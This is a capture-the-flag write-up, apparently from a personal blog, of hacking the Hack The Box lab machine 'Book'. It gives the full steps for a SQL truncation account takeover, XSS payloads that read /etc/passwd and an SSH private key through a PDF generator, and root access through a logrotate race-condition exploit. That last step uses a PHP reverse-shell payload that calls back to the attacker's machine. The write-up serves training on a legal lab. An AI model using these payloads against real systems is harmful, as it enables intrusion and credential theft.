22nd June 2021
Hack The Box Book Write-Up by T13nn3s

Hack The Box Write-Up Book –

There is no friend as loyal as a book

Ernest Hemingway

About Book

In this post, I’m writing a write-up for the machine Book from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Book is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag your points will be raised by 30. Although, This box is a medium-hard rated box. The difficulty is rated 6.4/10. It thinks for me, this is the hardest box on Hack The Box. Let’s find out…


Through the login page on, there is a possibility to register a new user account. The results of a wfuzz scan on port 80, shows that there is a hidden directory, named ‘admin’. On the account creation, I can create a user account and the admin account can be taken over by performing a SQL Truncate attack.

After logging in on the portal with the user account I’ m able to submit new books. The submission need to be reviewed by the administrator. The author field is vulnerable to Cross-site Scripting attacks, through this way I’m able to get the private key for the user ‘reader’ and create an SSH session to get the user.txt flag.

After getting the user flag, I found that logrotate version 3.11.0 is being used on this machine. In this version there is that the race condition in logrotate can be abused to elevate privileges to root. I scored a reverse shell to my machine as root.

Machine Info

Hack The Box Book Write-Up by T13nn3s
Machine Info
Hack The Box Book Machine IP and Creator
Machine IP and creators


Portscan (Nmap)

As always I start this box with a portscan, I save the output of the scan to a file.

~$ nmap -sC -sV -oA ./nmap/book.txt

The output of the portscan.

tarting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 13:46 EST
Nmap scan report for
Host is up (1.3s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.19 seconds

I have two open ports found on this box.

  1. 22/tcp (SSH)
  2. 80/tcp (HTTP)

Enumeration Web Server

I start with the enumeration of the webserver. I visited the website hosted on port 80 through the URL I landed on a fancy looking login page.

There is not more information on this web page. I ended up registering my account on this website.

username: test
E-mail: [email protected]
Password: test123

And sign in. Now, I got redirected to The first thing that stands out is a nice phrase above the navigation menu: If you have a Garden and a Library, you have everything you needed? What has this to say to me? On the right side of the navigation bar, I see that I’m now logged in as the user test. I can logout and login back again. So, my account credentials are kept save in a database somewhere. It seems that this website is belonging to a library.

Let’s poke some around on this website and let’s see if I can hack me into this server. Maybe we can score a shell? There are some books listed on the Books page. After clicking in the images a PDF-file is downloading. At the collections page, I see that I can submit a book to the library. On the Contact Us page, the message will be delivered to [email protected]. Let’s go further with wfuzz and try to find some hidden pages.

~$ wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404

The output of wfuzz.

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
* Wfuzz 2.4.5 - The Web Fuzzer                         *
Total requests: 4614
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                   
000000001:   200        321 L    683 W    6800 Ch     ""                                                                                                                                                                        
000000011:   403        9 L      28 W     277 Ch      ".hta"                                                                                                                                                                    
000000012:   403        9 L      28 W     277 Ch      ".htaccess"                                                                                                                                                               
000000013:   403        9 L      28 W     277 Ch      ".htpasswd"                                                                                                                                                               
000000286:   301        9 L      28 W     312 Ch      "admin"                                                                                                                                                                   
000001319:   301        9 L      28 W     311 Ch      "docs"                                                                                                                                                                    
000001991:   301        9 L      28 W     313 Ch      "images"                                                                                                                                                                  
000002021:   200        321 L    683 W    6800 Ch     "index.php"                                                                                                                                                               
000003588:   403        9 L      28 W     277 Ch      "server-status"                                                                                                                                                           
Total time: 45.35726
Processed Requests: 4614
Filtered Requests: 4605
Requests/sec.: 101.7257

I have got something. There are some hidden directories found. Only the page admin is working, access to the other pages is prohibited. I visited the page Again, there is a login page. This page is slightly different because this is the admin login. As I already know the e-mail address of the admin-account is [email protected], I can try to log in to his account, by guessing the password.

Hack The Box Book Admin Panel

SQL Truncate attack

Now, things are gonna be interested. I’m going back to the page and register an account and only filled in the Name and leave the e-mail address blank and click on the ‘Sign Up’ button. There is an error message popping up and shows a message that the e-mail address field should not be more than 20 characters.

Hack The Box Book Web Server SQL Truncate Vulnrebility
SQL Truncate vulnerability

This makes this login page vulnerable for SQL Truncation attack. I registered a new user account, with these credentials:

Name: T13nn3s
E-mail address: [email protected] A (with the A 21 characters)
Password: test123

After filling in these credentials, I changed the input type of the E-mail ‘field’ from email to ‘text’ to prevent an error that the e-mail address is invalid due to the spaces in this field. After this change, I click in ‘Sign Up’.

Hack The Box Book SQL Truncate Attack

My account is created. I have now taken over the [email protected] account! I’m now able to log in as [email protected] through the Admin Panel.

Hack The Box Book Admin Panel taken over

On the Collections page, I found the uploaded PDF-files. The uploaded file gots uploaded to the /Docs directory, I have already found that this directory exists, through by fuzzing the directories. As the URL from the PDF-file is pointing to http://book.htb/Docs/<filename>.pdf I need to edit the hosts’ file and add with a pointer to book.htb.

~$ sudo nano /etc/hosts       localhost       kali    book.htb

Save this file and I’m done. If I ping now to book.htb it resolves to the IP-address of this box.

~$ ping book.htb
PING book.htb ( 56(84) bytes of data.
64 bytes from book.htb ( icmp_seq=1 ttl=63 time=296 ms
64 bytes from book.htb ( icmp_seq=2 ttl=63 time=375 ms
64 bytes from book.htb ( icmp_seq=3 ttl=63 time=96.4 ms
64 bytes from book.htb ( icmp_seq=4 ttl=63 time=110 ms

I’m now able to load the uploaded PDF-files. Ok, proceed to the next step.

From XXS to LFI

It takes me a lot of time to get through this step. First, I’ve tried some payloads in PDF-files and then uploading those files to try to get a reverse shell, but that’s not gonna work. After some hours I found out, that this website is vulnerable to Coss-site Scripting (XSS). I’ve found this vulnerability on the Collections page. The Author field is vulnerable to XSS.

I have created a new text-file, with the name testfile.txt. In this directory I have started Python’s SimpleHTTPserver and logged in as the user and uploaded a dummy PDF, I have only changed the author to test Cross-site Scripting.

Book Title: me-and-you
Author: <script src=””></script>
File: dummy.pdf

And clicked on upload.

Hack The Box Book Cross Site Scipting

On my webserver, I see that the script got executed. An HTTP GET request comes in on my webserver, I have just found an XSS vulnerability.

~$ python -m SimpleHTTPServer 8000
Serving HTTP on port 8000 ... - - [07/Mar/2020 20:05:58] "GET /testfile.txt HTTP/1.1" 200 -

Ok, I have found the vulnerability. Now, I need to find a way to exploit this vulnerability. After some search online on the internet I found this article: Local File Read via XSS in Dynamically Generated PDF. After I read this article I give these a try.

I started by adding the script below to the Author field, by submitting a new book.

http://book.htb/admin/collections.php?type=collections=<img src=x onerror=document.write('aaaa')>

After submitting this book, I logged in as the admin and opened the PDF-link with all the submitted books on the Collections page. Instead of seeing the submitted books; I see the output of my script above. It works!

Hack The Box Book Cross Site Scripting Pentesting

Now, let’s try to get the /etc/passwd file. With this file, I can see the user accounts this box contains. I added the script below to the Author field.

http://book.htb/admin/collections.php?type=collections=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

I checked again the admin account and I got now an overview of all of the user accounts are available in the system.

Hack The Box Book XSS passwd file
 bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats
 Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-
 network:x:100:102:systemd Network
 Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-
 mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

This box contains several user accounts. The account ‘reader’ is not a default account for a Linux machine and this account has /bin/bash as his shell. I’m going to chase his private key now. With this script, I got the private key from the user reader.

http://book.htb/admin/collections.php?type=collections=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/pollinate/.ssh/id_rsa");x.send();</script>
Hack The Box Book Cross-site Scripting private key

There’s just one problem. The Document Viewer does not show all the rules completely. So the private key is not complete. I finally got the tip to open this private key from Google Chrome, the PDF-viewer in Google Chrome does not have this limitation.

SSH shell as reader

I copied this key from Google Chrome to a new file with the name ‘id_rsa’ and created a SSH shell as the user reader to this box and grabbed the user.txt flag.

~$ ssh [email protected] -i id_rsa 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Mar 10 22:29:50 UTC 2020

  System load:  0.06               Processes:            153
  Usage of /:   26.9% of 19.56GB   Users logged in:      1
  Memory usage: 23%                IP address for ens33:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Mar 10 21:46:59 2020 from
[email protected]:~$ ls
backups  lse.sh  user.txt
[email protected]:~$ cat user.txt 
[email protected]:~$ 

Privilege escalation to root


The next step is to do a privilege escalation to root. I need first starting the enumeration phase. At first, there are interesting files to see in this box. I have checked some directories and also the home directory /home/reader does not contain any interesting. I decided to check the processes. Maybe there is a process running as the user root which I can exploit.

I’m learning a lot of techniques and tools from IppSec . You’re gonna have to follow him. His write-ups are full of explanations. This is good for your learning curve. In his write-up from the box Teacher, I have learned the tool pspy. This tool can monitor Linux processes without the need of root permissions. So, I decided to give this tool also a change in this box.

I cloned this tool from the Github => https://github.com/DominicBreuker/pspy.

sudo git clone https://github.com/DominicBreuker/pspy
Cloning into 'pspy'...
remote: Enumerating objects: 1026, done.
remote: Total 1026 (delta 0), reused 0 (delta 0), pack-reused 1026
Receiving objects: 100% (1026/1026), 9.26 MiB | 1.64 MiB/s, done.
Resolving deltas: 100% (452/452), done.

This tool is using to programming language Go. I need first installing this language in Kali.

~$ sudo apt-get install golang
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following additional packages will be installed:
  golang-1.13 golang-1.13-doc golang-1.13-go golang-1.13-src golang-doc golang-go golang-src pkg-config
Suggested packages:
  bzr | brz mercurial
The following NEW packages will be installed:
  golang golang-1.13 golang-1.13-doc golang-1.13-go golang-1.13-src golang-doc golang-go golang-src pkg-config
0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded.
Need to get 62.9 MB of archives.
After this operation, 322 MB of additional disk space will be used.

I need to do some preperations before this tool can be used. I need the CPU architecture of the target machine. This box is a x64-bits machine. I can check the architecture with the command uname -a.

[email protected]:~$ uname -a
Linux book 5.4.1-050401-generic #201911290555 SMP Fri Nov 29 11:03:47 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

After cloning the repository there is an additional tool to be downloaded into the directory of pspy, which I have cloned from Github.

/pspy$ go get github.com/dominicbreuker/pspy/cmd

I have got now everything in place, so I can start building pspy.

/pspy$ GOOS=linux GOARCH=amd64 go build
/pspy$ ls
cmd  docker  Gopkg.lock  Gopkg.toml  images  internal  LICENSE  main.go  Makefile  pspy  README.md  vendor

I have now pspy listed in my directory. I have created the folder ‘http’ in my working directory and copied pspy to this directory and started SimpleHTTPServer, so that I can drop this program on the box.

/pspy$ sudo cp pspy ../http/
/pspy$ cd ../http/
/http$ python -m SimpleHTTPServer 8000

I’m still logged in as the user reader through SSH and downloaded this tool to this box and make sure that I can run this tool on the box with chmod.

[email protected]:~$ wget
--2020-03-14 15:31:13--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 4356058 (4.2M) [application/octet-stream]
Saving to: ‘pspy’

pspy                                                       100%[=======================================================================================================================================>]   4.15M   138KB/s    in 39s     

2020-03-14 15:31:52 (109 KB/s) - ‘pspy’ saved [4356058/4356058]

[email protected]:~$ chmod +x pspy

I have run this tool and let it run for 20 seconds and then I stop this program by pressing the Ctrl+C command. The output is below.

[email protected]:~$ ./pspy
2020/03/14 20:37:22 CMD: UID=1000 PID=9322   | /usr/sbin/apache2 -k start 
2020/03/14 20:37:22 CMD: UID=1000 PID=9321   | /usr/sbin/apache2 -k start 
2020/03/14 20:37:22 CMD: UID=1000 PID=9334   | node /usr/local/bin/html-pdf /var/www/html/admin/export/97437.html /var/www/html/admin/export/21241.pdf 
2020/03/14 20:37:23 CMD: UID=0    PID=9340   | sleep 5 
2020/03/14 20:37:25 CMD: UID=1000 PID=9342   | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/94220.html /var/www/html/admin/export/903.pdf 
2020/03/14 20:37:25 CMD: UID=1000 PID=9341   | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/94220.html /var/www/html/admin/export/903.pdf 
2020/03/14 20:37:25 CMD: UID=1000 PID=9348   | node /usr/local/bin/html-pdf /var/www/html/admin/export/94220.html /var/www/html/admin/export/903.pdf 
2020/03/14 20:37:27 CMD: UID=1000 PID=9353   | node /usr/local/bin/html-pdf /var/www/html/admin/export/60430.html /var/www/html/admin/export/29572.pdf 
2020/03/14 20:37:27 CMD: UID=1000 PID=9352   | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/60430.html /var/www/html/admin/export/29572.pdf 
2020/03/14 20:37:28 CMD: UID=1000 PID=9359   | node /usr/local/bin/html-pdf /var/www/html/admin/export/60430.html /var/www/html/admin/export/29572.pdf 
2020/03/14 20:37:29 CMD: UID=0    PID=9364   | /usr/sbin/logrotate -f /root/log.cfg 
2020/03/14 20:37:29 CMD: UID=0    PID=9363   | /bin/sh /root/log.sh 
2020/03/14 20:37:29 CMD: UID=0    PID=9365   | sleep 5 
2020/03/14 20:37:30 CMD: UID=1000 PID=9367   | node /usr/local/bin/html-pdf /var/www/html/admin/export/34091.html /var/www/html/admin/export/3054.pdf 
2020/03/14 20:37:30 CMD: UID=1000 PID=9366   | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/34091.html /var/www/html/admin/export/3054.pdf 
2020/03/14 20:37:30 CMD: UID=1000 PID=9373   | node /usr/local/bin/html-pdf /var/www/html/admin/export/34091.html /var/www/html/admin/export/3054.pdf 
2020/03/14 20:37:34 CMD: UID=0    PID=9378   | /usr/sbin/logrotate -f /root/log.cfg 
2020/03/14 20:37:34 CMD: UID=0    PID=9377   | /bin/sh /root/log.sh 
2020/03/14 20:37:34 CMD: UID=0    PID=9379   | sleep 5 
2020/03/14 20:37:34 CMD: UID=1000 PID=9380   | /usr/sbin/apache2 -k start 
2020/03/14 20:37:34 CMD: UID=0    PID=9384   | /bin/sh /root/log.sh 
2020/03/14 20:37:34 CMD: UID=0    PID=9383   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9382   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9381   | /bin/sh /root/log.sh 
2020/03/14 20:37:34 CMD: UID=0    PID=9387   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9386   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9385   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9392   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9391   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9390   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9389   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:34 CMD: UID=0    PID=9388   | /lib/systemd/systemd-udevd 
2020/03/14 20:37:37 CMD: UID=1000 PID=9395   | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/74920.html /var/www/html/admin/export/75474.pdf 
2020/03/14 20:37:37 CMD: UID=1000 PID=9394   | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/74920.html /var/www/html/admin/export/75474.pdf 
2020/03/14 20:37:37 CMD: UID=1000 PID=9393   | /usr/sbin/apache2 -k start 
2020/03/14 20:37:37 CMD: UID=1000 PID=9401   | node /usr/local/bin/html-pdf /var/www/html/admin/export/74920.html /var/www/html/admin/export/75474.pdf 
^CExiting program... (interrupt)
[email protected]:~$ 

I can see that logrotate is running. Let’s check which version of logrotate is using.

[email protected]:~$ logrotate --version    
logrotate 3.11

I found that there is a vulnerability in this version: https://www.exploit-db.com/exploits/47466.

Create payload and exploit logrotten

First, I need to compile this program.

~$ gcc -o logrotten logrotten.c

With the SimpleHTTPServer from Python, I’ve downloaded the ‘logrotten’ folder with the compiled program to the box and configured the right permissions to access the program.

[email protected]:~$ wget -r -np -R "index.html"
[email protected]:~$ cd logrotten/
[email protected]:~/logrotten$ chmod +x logrotten.c

Now, I need to create a payload. I the logrotten folder I’ve created a file named ‘payloadfile’ and with a reverse shell to my box.

[email protected]:~/logrotten$ nano payloadfile
[email protected]:~/logrotten$ cat payloadfile 
php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Everything is now set up, I can exploit logrotten to score a reverse shell with root permissions. I started the exploit with this command.

[email protected]:~/logrotten$ ./logrotten -p ./payloadfile /home/reader/backups/access.log
Hack The Box Book Exploit Logrotten

With a second SSH session I write some lines of text to /home/reader/backups/access.log to trigger the logrotate and a reverse shell is being established. The reverse shell is not stable, it seems that there is a scheduled disconnect configured. After the session hung up, there is a new session being created and I can perform a cat on the root flag.

connect to [] from book.htb [] 53664
# ls
# Hangup
[email protected]:~$ netcat -lvp 4444
listening on [any] 4444 ...
connect to [] from book.htb [] 53680
# cat roo       Hangup
[email protected]:~$ netcat -lvp 4444
listening on [any] 4444 ...
connect to [] from book.htb [] 53694
# cat root.txt
# Hangup

Box rooted!

Did you like this write-up? Please consider spending a respect point => https://www.hackthebox.eu/home/users/profile/224856

Happy Hacking!


I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *